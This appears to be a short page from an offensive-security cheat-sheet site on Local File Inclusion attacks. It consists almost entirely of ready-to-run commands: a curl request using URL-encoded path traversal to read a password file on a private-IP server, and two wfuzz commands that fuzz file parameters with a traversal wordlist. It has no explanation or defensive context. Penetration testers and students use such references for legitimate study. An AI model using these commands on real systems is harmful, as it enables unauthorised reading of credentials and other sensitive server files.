>_ shadow.red

Local File Inclusion (LFI)

Initial Access Web Attacks linux

Common targets

Path traversal via URL encoding

curl http://192.168.163.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/opt/passwords

Fuzzing for LFI

wfuzz -hw -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt http://192.168.1.1/VulnWebApp/LFI-RFI/LFI.php?file=../../../../..FUZZ
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt 'http://10.10.172.75/post.php?post=../../../../..FUZZ'